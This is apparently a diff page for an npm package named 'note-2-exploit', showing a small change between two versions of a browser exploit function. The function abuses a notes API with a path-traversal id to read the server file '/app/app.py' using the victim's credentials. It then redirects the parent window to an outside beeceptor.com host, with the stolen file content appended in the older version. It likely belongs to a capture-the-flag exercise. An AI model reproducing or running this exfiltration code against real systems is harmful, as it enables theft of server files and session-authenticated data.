note-2-exploit 1.0.4 → 1.0.5
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -1,4 +1,5 @@
|
|
|
1
1
|
async function exploit() {
|
|
2
|
+
window.parent.location.replace("https://omniman.free.beeceptor.com?q=qqqqqqq");
|
|
2
3
|
let file_content = await fetch("/api/notes?id=" + "/app/app.py", {
|
|
3
4
|
"headers": {
|
|
4
5
|
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
|
|
@@ -12,7 +13,6 @@ async function exploit() {
|
|
|
12
13
|
"credentials": "include"
|
|
13
14
|
}).then(res => res.text())
|
|
14
15
|
.catch(err => err.toString());
|
|
15
|
-
window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + file_content);
|
|
16
16
|
// fetch("http://10.113.184.121:10082/report", {
|
|
17
17
|
// "headers": {
|
|
18
18
|
// "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
|